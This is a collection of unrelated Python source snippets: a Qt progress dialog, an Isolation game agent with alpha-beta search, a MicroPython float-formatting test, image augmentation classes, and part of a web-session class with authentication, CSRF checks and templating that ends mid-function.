    def _create_percent(self, dialog, parent_sizer):
        """ Not implemented on Qt; percent display is handled by the gauge
        format.  Raises NotImplementedError when show_percent is set.
        """
        if not self.show_percent:
            return

        raise NotImplementedError

    def _create_timer(self, dialog, layout):
        """ Create the elapsed/estimated/remaining time rows if requested. """
        if not self.show_time:
            return

        self._elapsed_control = self._create_label(dialog, layout, "Elapsed time : ")
        self._estimated_control = self._create_label(dialog, layout, "Estimated time : ")
        self._remaining_control = self._create_label(dialog, layout, "Remaining time : ")

    def _create_control(self, parent):
        """ Create the toolkit-specific control (a plain QDialog). """
        return QtGui.QDialog(parent)

    def _create(self):
        """ Create the window, then populate it with the dialog contents. """
        super(ProgressDialog, self)._create()
        self._create_contents(self.control)

    def _create_contents(self, parent):
        """ Lay out message, gauge, timer rows and buttons inside *parent*. """
        dialog = parent
        layout = QtGui.QVBoxLayout(dialog)
        layout.setContentsMargins(self.margin, self.margin,
                                  self.margin, self.margin)

        # The 'guts' of the dialog.
        self._create_message(dialog, layout)
        self._create_gauge(dialog, layout)
        self._create_timer(dialog, layout)
        self._create_buttons(dialog, layout)

        dialog.setWindowTitle(self.title)

        parent.setLayout(layout)

    #-------------------------------------------------------------------------
    # Trait change handlers
    #-------------------------------------------------------------------------

    def _max_changed(self, new):
        """ Keep the widget's maximum in sync with the trait. """
        if self.progress_bar is not None:
            self.progress_bar.setMaximum(new)

    def _min_changed(self, new):
        """ Keep the widget's minimum in sync with the trait. """
        if self.progress_bar is not None:
            self.progress_bar.setMinimum(new)

    def _message_changed(self, new):
        """ Keep the message label's text in sync with the trait. """
        if self._message_control is not None:
            self._message_control.setText(new)
| StarcoderdataPython |
3220054 | """
Contains modules related to cleaning and features processing
Modules :
- Categorical_Data
- Date_Data
- Label encoder
- Missing_Values
- Process_Outliers
- Scaling
"""
__all__ = ['Categorical',
'Date',
'Deep_Encoder',
'Missing_Values',
'Outliers']
| StarcoderdataPython |
4934725 | <filename>GamePlaying/my_custom_player.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 8 13:56:52 2020
@author: alysonweidmann
"""
import random
from GamePlaying.sample_players import DataPlayer
_WIDTH = 11   # board width in playable columns
_HEIGHT = 9   # board height in playable rows
# Total encoded board size: each row carries 2 extra (presumably border)
# columns, minus 2 unused trailing positions -- TODO confirm against the
# isolation board encoding.
_SIZE = (_WIDTH + 2) * _HEIGHT - 2
class CustomPlayer(DataPlayer):
""" Implement your own agent to play knight's Isolation
The get_action() method is the only required method for this project.
You can modify the interface for get_action by adding named parameters
with default values, but the function MUST remain compatible with the
default interface.
**********************************************************************
NOTES:
- The test cases will NOT be run on a machine with GPU access, nor be
suitable for using any other machine learning techniques.
- You can pass state forward to your agent on the next turn by assigning
any pickleable object to the self.context attribute.
**********************************************************************
"""
def get_action(self, state):
""" Employ an adversarial search technique to choose an action
available in the current state calls self.queue.put(ACTION) at least
This method must call self.queue.put(ACTION) at least once, and may
call it as many times as you want; the caller will be responsible
for cutting off the function after the search time limit has expired.
See RandomPlayer and GreedyPlayer in sample_players for more examples.
**********************************************************************
NOTE:
- The caller is responsible for cutting off search, so calling
get_action() from your own code will create an infinite loop!
Refer to (and use!) the Isolation.play() function to run games.
**********************************************************************
"""
# TODO: Replace the example implementation below with your own search
# method by combining techniques from lecture
#
# EXAMPLE: choose a random move without any search--this function MUST
# call self.queue.put(ACTION) at least once before time expires
# (the timer is automatically managed for you)
if state.ply_count < 2:
#If game is just starting, take the center square if available, or next to it if not
#try:
# self.queue.put(self.center2ind(state))
#except:
self.queue.put(random.choice([self.center2ind(state)+1, self.center2ind(state)-1]))
else:
self.queue.put(self.alpha_beta(state,
score_func='defensive',
depth=2))
@property
def score_fn(self):
# store heuristic functions as callables in dictionary
# can vary scoring mechanism in self.alpha_beta()
return {'baseline': self.baseline,
'offensive': self.offensive,
'defensive': self.defensive,
'offensive2defensive': self.offensive2defensive,
'defensive2offensive': self.defensive2offensive,
'favor_center': self.favor_center,
'block_opponent': self.block_opponent,
'heuristic1': self.heuristic1,
'heuristic2': self.heuristic2,
'heuristic3': self.heuristic3,
'heuristic4': self.heuristic4}
def ratio(self, state):
area = len(state.liberties(None))
return state.ply_count / area
def ind2xy(self, ind):
""" Convert from board index value to xy coordinates
"""
return (ind % (_WIDTH + 2), ind // (_WIDTH + 2))
def score(self, state):
#Number own moves available
own_loc = state.locs[self.player_id]
own_liberties = state.liberties(own_loc)
return len(own_liberties)
def opp_score(self, state):
#Number opponent moves available
opp_loc = state.locs[1 - self.player_id]
opp_liberties = state.liberties(opp_loc)
return len(opp_liberties)
def offensive(self, state):
#Minimize opponent's available moves at a weighted cost against own
return self.score(state) - (self.opp_score(state)*2)
def defensive(self, state):
#Maximize own available moves at weighted cost against opponent's
return (self.score(state)*2) - self.opp_score(state)
def defensive2offensive(self, state):
ratio = self.ratio(state)
if ratio <= 0.5:
return self.defensive(state)
else:
return self.offensive(state)
def offensive2defensive(self, state):
ratio = self.ratio(state)
if ratio <= 0.5:
return self.offensive(state)
else:
return self.defensive(state)
def center(self):
return (_WIDTH // 2, _HEIGHT // 2)
def center2ind(self, state):
#Convert center xy position to loc index
center_xy = self.center()
for i in state.actions():
if self.ind2xy(i) == center_xy:
return i
def favor_center(self, state):
# Get index of center square
center_xy = self.center()
#Get player positions relative to center
own_loc = state.locs[self.player_id]
opp_loc = state.locs[1 - self.player_id]
own_xy = self.ind2xy(own_loc)
opp_xy = self.ind2xy(opp_loc)
own_distance = abs(own_xy[1] - center_xy[1]) + abs(own_xy[0] - center_xy[0])
opp_distance = abs(opp_xy[1] - center_xy[1]) + abs(opp_xy[0] - center_xy[0])
#scale to value between -1 and +1, as less important than having more moves than opponent
return float(own_distance - opp_distance)/10
def block_opponent(self, state):
# Find opponent moves that are legal moves for the agent and steal them
own_loc = state.locs[self.player_id]
opp_loc = state.locs[1 - self.player_id]
own_liberties = state.liberties(own_loc)
opp_liberties = state.liberties(opp_loc)
equal_moves = list(set(own_liberties).intersection(opp_liberties))
return self.offensive(state) + len(equal_moves)
def baseline(self, state):
#my_moves heuristic for baseline comparisons
return self.score(state) - self.opp_score(state)
def heuristic1(self, state):
#if players have equal numbers of moves, score to favor the center of the board
#Otherwise, play offensive2defensive
if self.score(state) != self.opp_score(state):
return self.offensive2defensive(state)
else:
return self.favor_center(state)
def heuristic2(self, state):
#if players have equal numbers of moves, score to favor the center of the board
#Otherwise, play offensive2defensive
if self.score(state) != self.opp_score(state):
return self.defensive2offensive(state)
else:
return self.favor_center(state)
    def heuristic3(self, state):
        """Play offensive; when both players have the same number of moves,
        fall back to the center-distance tie-breaker.
        (Previous comment wrongly said offensive2defensive.)"""
        if self.score(state) != self.opp_score(state):
            return self.offensive(state)
        else:
            return self.favor_center(state)
    def heuristic4(self, state):
        """Play defensive; when both players have the same number of moves,
        fall back to the center-distance tie-breaker.
        (Previous comment wrongly said offensive2defensive.)"""
        if self.score(state) != self.opp_score(state):
            return self.defensive(state)
        else:
            return self.favor_center(state)
def alpha_beta(self, state, score_func, depth):
def min_value(state, alpha, beta, depth):
if state.terminal_test(): return state.utility(self.player_id)
if depth <= 0: return self.score_fn[score_func](state)
value = float("inf")
for action in state.actions():
value = min(value, max_value(state.result(action), alpha, beta, depth - 1))
if value <= alpha:
return value
else:
beta = min(beta, value)
return value
def max_value(state, alpha, beta, depth):
if state.terminal_test(): return state.utility(self.player_id)
if depth <= 0: return self.score_fn[score_func](state)
value = float("-inf")
for action in state.actions():
value = max(value, min_value(state.result(action), alpha, beta, depth - 1))
if value >= beta:
return value
else:
alpha = max(alpha, value)
return value
alpha = float("-inf")
beta = float("+inf")
depth = depth
best_score = float("-inf")
best_move = None
for a in state.actions():
v = min_value(state.result(a), alpha, beta, depth - 1)
alpha = max(alpha, v)
if v >= best_score:
best_score = v
best_move = a
return best_move
| StarcoderdataPython |
11346074 | print("%s" % 1.0)
# Exercise %-style formatting of floats; each print's exact output is the
# expected test result, so statement order and format strings must not change.
print("%r" % 1.0)
print("%d" % 1.0)
print("%i" % 1.0)
print("%u" % 1.0)
# these 3 have different behaviour in Python 3.x versions
# uPy raises a TypeError, following Python 3.5 (earlier versions don't)
#print("%x" % 18.0)
#print("%o" % 18.0)
#print("%X" % 18.0)
# exponent / fixed / general float conversions, upper and lower case
print("%e" % 1.23456)
print("%E" % 1.23456)
print("%f" % 1.23456)
print("%F" % 1.23456)
print("%g" % 1.23456)
print("%G" % 1.23456)
# zero-padding combined with non-finite values
print("%06e" % float("inf"))
print("%06e" % float("-inf"))
print("%06e" % float("nan"))
print("%02.3d" % 123) # prec > width
print("%+f %+f" % (1.23, -1.23)) # float sign
print("% f % f" % (1.23, -1.23)) # float space sign
print("%0f" % -1.23) # negative number with 0 padding
# numbers with large negative exponents
print('%f' % 1e-10)
print('%f' % 1e-20)
print('%f' % 1e-50)
print('%f' % 1e-100)
print('%f' % 1e-300)
# large decimal precision should be truncated and not overflow buffer
# the output depends on the FP calculation so only first 2 digits are printed
# (the 'g' with small e are printed using 'f' style, so need to be checked)
print(('%.40f' % 1e-300)[:2])
print(('%.40g' % 1e-1)[:2])
print(('%.40g' % 1e-2)[:2])
print(('%.40g' % 1e-3)[:2])
print(('%.40g' % 1e-4)[:2])
| StarcoderdataPython |
1867894 | import abc
import cv2 as cv
import matplotlib.pyplot as plt
import scipy
from skimage.measure import regionprops
from tfcore.utilities.image import *
from PIL import Image
class Preprocessing():
    """Ordered container of image-augmentation callbacks.

    Callbacks have the signature f(img_x, img_y) -> (img_x, img_y).
    Paired (xy) callbacks run first, then x-only, then y-only.
    """

    def __init__(self):
        # (x-only, y-only, paired-xy) callback lists
        self.functions = ([], [], [])

    def add_function_x(self, user_function):
        """Register a callback applied to img_x only."""
        self.functions[0].append(user_function)

    def add_function_y(self, user_function):
        """Register a callback applied to img_y only."""
        self.functions[1].append(user_function)

    def add_function_xy(self, user_function):
        """Register a callback applied to the (img_x, img_y) pair."""
        self.functions[2].append(user_function)

    def run(self, img_x, img_y):
        """Apply all registered callbacks and return the transformed pair."""
        for fn in self.functions[2]:
            img_x, img_y = fn(img_x, img_y)
        for fn in self.functions[0]:
            img_x, _ = fn(img_x, None)
        for fn in self.functions[1]:
            _, img_y = fn(None, img_y)
        return img_x, img_y
class Base():
    """Base class for augmentation ops that pick one of several modes.

    Subclasses implement function(img_x, img_y) and use self.new_index to
    select a mode either at random or in round-robin order.
    """

    def __init__(self, modes=[], shuffle=True):
        # NOTE: the shared default list is never mutated here, so the
        # mutable-default pitfall does not bite, but subclasses should
        # still pass their own sequence.
        self.shuffle = shuffle
        self.modes = modes
        self.idx = 0

    @property
    def new_index(self):
        """Return the next mode index (random or round-robin).

        Bug fix: the sequential path reset the counter one step too early,
        so the last mode was never selected and the cycle repeated an
        index; a proper modulo cycle visits every mode.
        """
        if self.shuffle:
            # assumes random.randint-style inclusive bounds -- TODO confirm
            # which randint the star-import provides
            self.idx = randint(0, len(self.modes) - 1)
        else:
            self.idx = (self.idx + 1) % len(self.modes)
        return self.idx

    @abc.abstractmethod
    def function(self, img_x, img_y):
        # NOTE: without ABCMeta as metaclass this decorator is not enforced
        # at instantiation time; the raise is the actual guard.
        raise NotImplementedError("Please Implement this method")

    def function_iterator(self, iterator):
        """Yield function() applied to every (img_x, img_y) pair."""
        for image_x, image_y in iterator:
            img_x, img_y = self.function(image_x, image_y)
            yield img_x, img_y
class Scale(Base):
    """Downscale img_x by one of `factors`; resize img_y to the original
    resolution (typical LR/HR pair generation for super-resolution)."""

    def __init__(self, factors=(2, 3, 4), interp='bicubic', shuffle=True):
        self.interp = interp
        super().__init__(modes=factors, shuffle=shuffle)

    def function(self, img_x, img_y):
        # Bug fix: img_x.shape was read before the None check, crashing
        # when only img_y was supplied.  Use whichever image exists as the
        # shape reference (behaviour is unchanged when both are present).
        ref = img_x if img_x is not None else img_y
        if ref is None:
            return img_x, img_y
        shape = ref.shape
        factor = self.modes[self.new_index]
        if img_x is not None:
            img_x = resize(img_x, (int(shape[0] / factor), int(shape[1] / factor)), self.interp)
        if img_y is not None:
            img_y = resize(img_y, (int(shape[0]), int(shape[1])), self.interp)
        return img_x, img_y
class DownScale(Base):
    """Deterministically downscale both images by a fixed factor."""

    def __init__(self, factors=2, interp='bicubic'):
        self.interp = interp
        super().__init__(modes=[factors])

    def function(self, img_x, img_y):
        """Shrink each (non-None) image by self.modes[0] in both axes."""
        factor = self.modes[0]
        if img_x is not None:
            target = (int(img_x.shape[0] / factor), int(img_x.shape[1] / factor))
            img_x = resize(img_x, target, self.interp)
        if img_y is not None:
            target = (int(img_y.shape[0] / factor), int(img_y.shape[1] / factor))
            img_y = resize(img_y, target, self.interp)
        return img_x, img_y
class Flip(Base):
    """Flip images along a randomly/sequentially selected axis.

    NOTE(review): the selected *mode index* (0 or 1) is passed directly
    as the OpenCV flip code, so the mapping depends on the order of
    `direction` -- confirm 0/1 match the intended axes.
    """

    def __init__(self, direction=('horizontal', 'vertical'), shuffle=True):
        super().__init__(modes=direction, shuffle=shuffle)

    def function(self, img_x, img_y):
        """Flip both images with the same flip code; None passes through."""
        flip_code = self.new_index
        img_x = cv.flip(img_x, flip_code) if img_x is not None else img_x
        img_y = cv.flip(img_y, flip_code) if img_y is not None else img_y
        return img_x, img_y
class Rotate(Base):
    """Rotate both images by one of a fixed set of angles (degrees).

    Cleanup: removed the commented-out cv.imshow/cv.waitKey debug code.
    """

    def __init__(self, angle=(), steps=10, shuffle=True):
        # With no explicit angles, build the full circle in `steps`-degree
        # increments, e.g. steps=10 -> 0, 10, ..., 350.
        if len(angle) == 0:
            angle = [steps * i for i in range(360 // steps)]
        super().__init__(modes=angle, shuffle=shuffle)

    def function(self, img_x, img_y):
        """Rotate both (non-None) images by the same selected angle."""
        # reshape=False keeps the output the same size as the input;
        # mode='reflect' fills the exposed borders.
        index = self.new_index
        if img_x is not None:
            img_x = scipy.ndimage.rotate(img_x, self.modes[index], reshape=False, prefilter=False, mode='reflect')
        if img_y is not None:
            img_y = scipy.ndimage.rotate(img_y, self.modes[index], reshape=False, prefilter=False, mode='reflect')
        return img_x, img_y
class Brightness(Base):
    """Shift brightness by a random offset that keeps values in [0, 255].

    Bug fixes: np.min/np.max were read from img_x before its None check,
    leftover cv.imshow/cv.waitKey debug calls blocked execution, and the
    builtins `min`/`max` were shadowed; all corrected.
    """

    def __init__(self, shuffle=True):
        super().__init__(modes=(), shuffle=shuffle)

    def function(self, img_x, img_y):
        """Add one random offset to both images and clip to [0, 255]."""
        ref = img_x if img_x is not None else img_y
        if ref is None:
            return img_x, img_y
        lo = np.min(ref)
        headroom = abs(256 - np.max(ref))
        # offset drawn uniformly from [-lo, headroom] so the reference
        # image cannot leave the valid intensity range
        value = randint(0, headroom + lo) - lo
        if img_x is not None:
            img_x = np.clip(img_x + value, 0, 255)
        if img_y is not None:
            img_y = np.clip(img_y + value, 0, 255)
        return img_x, img_y
class ToRGB(Base):
    """Expand single-channel images to a (H, W, 3) layout.

    NOTE(review): np.resize flattens and *tiles* the source buffer rather
    than replicating the gray value per pixel (np.repeat/np.stack would do
    that) -- confirm this is the intended behaviour.
    """
    def __init__(self):
        super().__init__()

    def function(self, img_x, img_y):
        # Reshape each (non-None) image to three channels by tiling.
        if img_x is not None:
            img_x = np.resize(img_x, (img_x.shape[0], img_x.shape[1], 3))
        if img_y is not None:
            img_y = np.resize(img_y, (img_y.shape[0], img_y.shape[1], 3))
        return img_x, img_y
class Central_Crop(Base):
    """Crop a fixed-size window from the center of each image.

    `size` is (width, height), matching the original indexing.

    Bug fixes: shape unpacking now uses shape[:2] so colour images do not
    break, and the size check rejects images where *either* dimension is
    too small (the old `and` only raised when both were).
    """

    def __init__(self, size=(512, 512)):
        self.crop_size = size
        super().__init__()

    def function(self, img_x, img_y):
        """Center-crop both images; None inputs pass through unchanged."""
        img_x = self._crop(img_x)
        img_y = self._crop(img_y)
        return img_x, img_y

    def _crop(self, img):
        # Crop one image around its center, or pass None through.
        if img is None:
            return None
        y, x = img.shape[:2]
        if x < self.crop_size[0] or y < self.crop_size[1]:
            raise Exception("File size to small!")
        startx = x // 2 - (self.crop_size[0] // 2)
        starty = y // 2 - (self.crop_size[1] // 2)
        return img[starty:starty + self.crop_size[1], startx:startx + self.crop_size[0]]
class Crop_by_Center(Base):
    """Crop a window centered on the brightest region of img_x.

    A binary mask of pixels within `treshold` of the maximum intensity is
    built and its centroid (skimage regionprops) becomes the crop center;
    the same window is applied to img_y.  `size` is (width, height), the
    same convention as Central_Crop.

    Bug fixes: the y clamp used shape[1]/x-axis crop dimensions, the slice
    axes were swapped relative to the corner computation, and cropping
    img_y when img_x was None raised NameError; all corrected.
    """

    def __init__(self, treshold=25, size=(256, 256)):
        self.crop_size = size
        self.treshold = treshold
        super().__init__()

    def function(self, img_x, img_y):
        """Crop both images around img_x's bright-region centroid."""
        if img_x is not None:
            _, mask = cv.threshold(img_x, np.max(img_x) - self.treshold, 255, cv.THRESH_BINARY)
            # centroid is (row, col); derive the crop's top-left corner
            center_of_mass = regionprops(mask, img_x)[0].centroid
            startx = int(center_of_mass[1]) - (self.crop_size[0] // 2)
            starty = int(center_of_mass[0]) - (self.crop_size[1] // 2)
            # clamp each corner into the valid range for its own axis
            startx = max(0, min(startx, img_x.shape[1] - self.crop_size[0]))
            starty = max(0, min(starty, img_x.shape[0] - self.crop_size[1]))
            img_x = img_x[starty:starty + self.crop_size[1], startx:startx + self.crop_size[0]]
            if img_y is not None:
                img_y = img_y[starty:starty + self.crop_size[1], startx:startx + self.crop_size[0]]
        return img_x, img_y
| StarcoderdataPython |
4807326 | """
Holds the session class for user authentication and session specific data
storage
"""
################################################################################
################################################################################
import os
import time
import datetime
import traceback
import logging, logging.handlers
import traceback
import re
import tmplbridge
import random
import weakref
import prefs
import uuid
import task
import simplejson as json
import types
import twentyc.tmpl as tmpl_engine
from twentyc.tools.thread import RunInThread
import twentyc.vodka.tools.session as vt_session
from rpc import RPC_JSON_KEYS
from wsgi import webapp
import constants
version = constants.version

# Authentication state machine values for Session.auth_status
AUTH_IDLE = 0
AUTH_PROCESSING = 1
AUTH_FINISHED = 2

# Human-readable names indexed by the AUTH_* values above
AUTH_STATUS_XL = [
    "IDLE",
    "PROCESSING",
    "FINISHED"
]

# Hooks called after a successful login / after logout (see
# Session.auth_finalize and Session.auth_clear)
AUTH_FINALIZE = []
AUTH_CLEAR_FINALIZE = []

# Per task-type concurrency limits, keyed "<module>.<task>"; tasks not
# listed default to a capacity of 1 (see Session.task_run)
TASK_CAPACITY = {
}
################################################################################
class AuthInProgressException(Exception):
    """Raised by auth_start() when another authentication attempt is
    already running for this session."""
    pass
class LoginInvalidException(Exception):
    """Raised when the supplied login credentials are invalid."""
    pass
class LoginPermsException(Exception):
    """Login denied because the account lacks the required permissions."""

    def error_info(self):
        """Return log and user-facing messages describing the denial."""
        log_msg = "Login denied due to missing permissions: %s" % str(self)
        return {
            "log_msg": log_msg,
            "user_msg": constants.ERR_LOGIN_PERMS
        }
################################################################################
# VodkaApp session
class Session(object):
"""
User session object
"""
##############################################################################
    def __init__(self, app, fromRequest, web_ses_id):
        """
        Initialize the session object

        app should be a reference to a VodkaApp instance
        fromRequest should be a reference to _environ.get("_request")
        web_ses_id is the id of the underlying web session
        """
        self.fromRequest = fromRequest

        #reference to the VodkaApp instance (weak proxy so the session does
        #not keep the app alive)
        self.app = weakref.proxy(app)

        #static file url, suffixed with the app version for cache busting
        self.staticFileUrl = self.app.config.get("server", {}).get("static_file_url","/")
        self.staticFileUrl = os.path.join(
            self.staticFileUrl,
            version
        )

        self.pref_manager = None

        self.tmpl_engines = {}

        #path to the currently selected brand directory
        self.brand_path = ""

        #the selected brand (picked by request hostname)
        self.brand = self.pick_brand(fromRequest)

        #static file url (brands)
        self.staticFileUrlBrand = self.staticFileUrl + "/brands/"+self.brand.get("name")

        #the selected locale
        self.locale = self.brand["locale"]
        self.lang = self.locale.lang

        #the selected theme (picked by user agent)
        self.theme = self.pick_theme(fromRequest)

        #error messages that can be displayed in-page or added to json output
        self.messages = []
        self.errors = []

        #if set, the specified theme will be used instead of the picked one
        self.override_theme = False

        #if set, the simple theme will be forced no matter what
        self.fixed_theme_forced = False

        #will hold module perms for the authenticated session as it is stored
        #in couchbase
        self.module_perms = {}
        self.module_perms_structure = {}

        # a unique id identifying this session
        self.client_id = ""

        # authentication state: auth_id is set on success, auth_status is
        # one of the AUTH_* constants, auth_data holds the in-flight kwargs
        self.auth_id = None
        self.auth_status = None
        self.auth_data = None

        #session id for the web sessions
        self.web_ses_id = web_ses_id

        #user id that was returned by successful login
        self.user_id = 0

        #user name that was returned by successful login
        self.user = None

        self.sounds = {}

        self.env = None

        #user agent (lower-cased for the uses_* checks)
        self.ua = fromRequest.get('user_agent').lower();

        #store imported prefs for later confirmation
        self.imported_prefs = None

        #specifies which preference document keys the user can create / write to
        self.pref_document_access = []

        #holds remote code execution requirements
        self.rce = {}

        #holds current tasks running for this session
        self.tasks = []

        #holds update index data for rpc/update
        self.update_index_map = {}
        self.update_index_rev = {}
        self.update_index_dropped = {}
##############################################################################
def rce_require(self, name, code, grace=10, limit=5):
"""
Remote code execution required.
This will execute a piece of javascript code on the user's client (browser)
When a remote code execution is sent to the client it is expecting to be
satisified via rce_satisfied(). If that fails to happen within the grace period
and request limit the session will be logged out.
name <str> unqiue name for the rce to identify it
code <str> valid javascript code to execute
grace <int> grace period between execution requests (seconds)
limit <int> if after n requests rce has not been satisified the session will
be logged out
"""
try:
if self.rce.has_key(name) or not code:
return
id = uuid.uuid4()
self.rce[name] = {
"id" : id,
"code" : code,
"time" : 0,
"limit" : limit,
"grace" : grace
}
except:
raise
##############################################################################
def rce_satisfy(self, name, id):
try:
if self.rce.has_key(name):
if str(self.rce.get(name).get("id")) == id:
del self.rce[name]
except:
raise
##############################################################################
def verify_csrf(self, request):
a = request.get('query', {});
csrf_token_a = a.get('csrfmiddlewaretoken');
csrf_token_b = webapp.get_cookie(request, "csrftoken")
if csrf_token_a != csrf_token_b or not csrf_token_b:
return False
return True
##############################################################################
# pick brand depending on host name
    def pick_brand(self, request, f_brand=None):
        """
        Cycle through the brand map in config and see if the hostname
        matches any of the url masks; pick the brand accordingly.
        On no match pick default.
        If f_brand is set, always use the brand matching f_brand(str) by
        name.

        Side effects: updates self.brand, self.staticFileUrlBrand,
        self.brand_path and the request session's url_map.
        """
        host = request.get("host")
        s_brand = None
        # last matching mask wins when several brand masks match the host
        for brand, mask in self.app._brand_map.items():
            if mask.match(host):
                s_brand = self.app.brand[brand]
        # explicit brand override by name
        if f_brand:
            if self.app.brand.get(f_brand):
                s_brand = self.app.brand.get(f_brand)
        if not s_brand:
            s_brand = self.app.brand["default"]

        dir = s_brand.get("dir")

        # map static urls to the brand's htdocs, falling back to the
        # default brand's files where a third path element is given
        request["session"].data["url_map"] = [
            ("/css", "%s/htdocs/css" % dir, "%s/htdocs/css" % self.app.brand["default"].get("dir")),
            ("/js", "%s/htdocs/js" % dir, "%s/htdocs/js" % self.app.brand["default"].get("dir")),
            ("/favicon.ico", "%s/htdocs/favicon.ico" % dir),
            ("favicon.ico", "%s/htdocs/favicon.ico" % dir)
        ]

        self.brand = s_brand
        self.staticFileUrlBrand = self.staticFileUrl + "/brands/"+self.brand.get("name")
        self.brand_path = dir

        return s_brand
##############################################################################
# pick default theme depending on user agent
def pick_theme(self, request):
"""
Select theme by useragent
"""
ua = request.get("user_agent")
for name, regex in self.app._theme_map.items():
if regex.match(ua):
return name
return self.app.config.get("app",{}).get("theme.default", "default")
##############################################################################
def uses_chrome(self):
"""
Return True if the useragent indicates that google chrome is being used
"""
if self.ua.find("chrome") != -1:
return True
else:
return False
##############################################################################
# check the user agent string to figure of if it's safari
def uses_safari(self):
"""
Return True if the useragent indicates that safari is being used
"""
if self.ua.find("safari") != -1:
return True
else:
return False
##############################################################################
# update session variables
def update(self, **kwargs):
"""
Update session variables
possible keyword arguments:
theme (str)
brand (str)
locale (locale object)
user (str), username
"""
if "theme" in kwargs:
if kwargs.get("theme") == "default" and not self.uses_chrome() and not self.uses_safari():
self.theme = "mobile"
self.fixed_theme_forced = True
else:
self.fixed_theme_forced = False
self.theme = kwargs["theme"]
if "brand" in kwargs:
self.brand = kwargs["brand"]
if "locale" in kwargs:
self.locale = kwargs["locale"]
self.lang = self.locale.lang
if "user" in kwargs:
self.user = kwargs["user"]
##############################################################################
    def update_sesmap(self):
        """Publish this web session's auth_id to the app-wide session map
        (None when the session is not authenticated)."""
        self.app.update_sesmap({ self.web_ses_id : self.auth_id or None })
##############################################################################
def get_client(self, for_duration=10):
"""
Get the first free VodkaClient instance from the app's client pool
"""
client = self.app.client_pool.get_client(for_duration)
i = 0
while not client:
client = self.app.client_pool.get_client(for_duration)
time.sleep(0.1)
i+=1
if i >= 1000:
raise Exception("No inactive clients")
return client
##############################################################################
    def free_client(self, client):
        """
        Respawn (return to the pool) an unused / finished client obtained
        via get_client()
        """
        self.app.client_pool.respawn(client)
##############################################################################
    def is_authed(self):
        """
        Return True if session is authenticated, False if not.
        Alias for is_connected().
        """
        return self.is_connected()
##############################################################################
# check if session is connected (has auth_id)
def is_connected(self):
"""
Return True if session's auth_id property is set, False if not
"""
if self.auth_id:
return True
return False
##############################################################################
def get_bridge(self, request=None, ignoreExpiry=False):
"""
Return TmplBridge object for the current request
"""
if not request:
request = self.fromRequest
if not request.get("bridge"):
request["bridge"] = tmplbridge.TmplBridge(self, request, ignoreExpiry)
return request.get("bridge")
##############################################################################
# append an error message
    def error(self, error, toSession=False):
        """
        Append error(str) to self.errors.
        NOTE(review): the toSession flag is currently unused -- confirm
        whether it can be removed or should gate some behaviour.
        """
        self.errors.append(error)
##############################################################################
# get all error messages and clear error message stack
def get_errors(self):
"""
Return list containing errors in self.errors
Empty self.errors
"""
e = list(self.errors)
self.errors = []
return e
##############################################################################
def auth_working(self):
if self.auth_status == AUTH_PROCESSING:
return True
else:
return False
##############################################################################
    def auth_process(self, *args, **kwargs):
        """Perform the actual authentication; run in a worker thread by
        auth_start().  This base implementation is a stub that always
        "succeeds" with 1 -- subclasses are expected to override it."""
        return 1
##############################################################################
    def auth_success(self, res):
        """Result handler for the auth thread: store the result as the
        session's auth_id, run the AUTH_FINALIZE hooks, mark the attempt
        finished and reload module permissions.  Order matters: finalize
        hooks still see auth_data."""
        self.auth_data['result'] = res
        self.auth_id = res
        self.auth_finalize()
        self.auth_status = AUTH_FINISHED
        self.auth_data = None
        self.reload_20c_module_perms()
##############################################################################
    def auth_error(self, error):
        """Error handler for the auth thread: queue the error message for
        the user, reset auth state and log the traceback."""
        self.error(error)
        self.auth_cancel()
        webapp.log.error(traceback.format_exc())
##############################################################################
    def auth_cancel(self):
        """Abort any authentication attempt and reset the session's auth
        state back to idle/unauthenticated."""
        self.auth_status = AUTH_IDLE
        self.auth_data = None
        self.auth_id = None
##############################################################################
    def auth_validate(self):
        """Return True while an auth attempt is running and has not
        exceeded its optional timeout; cancel it (and queue a user
        message) when it has timed out."""
        if self.auth_working():
            # timeout of 0 / missing means "no timeout"
            to = self.auth_data.get("timeout", 0)
            if to:
                start_t = self.auth_data.get("start_t")
                now = time.time()
                if now - start_t > to:
                    self.error("Authentication timed out, please try again")
                    self.auth_cancel()
                    return False
            return True
        return False
##############################################################################
    def auth_start(self, **kwargs):
        """Kick off an authentication attempt in a worker thread.

        kwargs are stored as auth_data (plus a start_t timestamp used by
        auth_validate for timeouts) and passed through to auth_process.
        Raises AuthInProgressException when an attempt is already running.
        """
        if not self.auth_working():
            self.auth_status = AUTH_PROCESSING
            self.auth_data = kwargs
            self.auth_data.update(start_t=time.time())
            # success -> auth_success, failure -> auth_error
            t = RunInThread(self.auth_process)
            t.error_handler = self.auth_error
            t.result_handler = self.auth_success
            t.start(**kwargs)
        else:
            raise AuthInProgressException()
##############################################################################
    def auth_finalize(self):
        """Run all registered AUTH_FINALIZE hooks with (session,
        auth_data).  A failing hook cancels authentication, is logged and
        re-raised."""
        for fn in AUTH_FINALIZE:
            try:
                fn(self, self.auth_data)
            except Exception, inst:
                self.auth_cancel()
                webapp.log.error(traceback.format_exc())
                raise
##############################################################################
    def auth_clear_process(self):
        """Logout work executed in a worker thread by auth_clear(); this
        base implementation does nothing and exists to be overridden."""
        pass
##############################################################################
    def auth_clear(self):
        """Log the session out: run auth_clear_process in a background
        thread, fire the AUTH_CLEAR_FINALIZE hooks (errors are logged but
        swallowed) and always drop the auth_id."""
        t = RunInThread(self.auth_clear_process)
        t.start()
        try:
            for fn in AUTH_CLEAR_FINALIZE:
                fn(self)
        except Exception, inst:
            webapp.log.error(traceback.format_exc())
        finally:
            self.auth_id = None
##############################################################################
    def tmpl(self, name, namespace=None, request=None, tmpl_type="cheetah", theme=None, variables={}, **kwargs):
        """
        Load a template and return its rendered response.

        Currently supported template tmpl_types are: "cheetah", "jinja2"
        and "django".

        Templates can come from modules, the vodka barebone or brands.

        name      : template file name
        namespace : module namespace; combined with the theme to locate
                    the template (None -> barebone vodka templates)
        request   : current request (used for the bridge and headers)
        theme     : overrides self.theme when given
        variables : extra template variables.
                    NOTE(review): this mutable default dict is mutated
                    below via variables.update(...), so values leak
                    between calls that rely on the default -- confirm
                    whether callers always pass their own dict.
        """
        if not theme:
            theme = self.theme

        # templates are namespaced per theme, eg. "<module>.<theme>"
        if theme and namespace:
            namespace = "%s.%s" % (namespace, theme)

        tmpl_code = None
        tmpl_path = None

        # never allow rendered pages to be framed (clickjacking guard)
        self.deny_frame(request)

        #if namespace is not defined, check barebone vodka templates
        if not namespace:
            tmpl_path = os.path.join("tmpl")
            if not os.path.exists(tmpl_path):
                raise Exception("Template not found: %s" % tmpl_path)
        else:
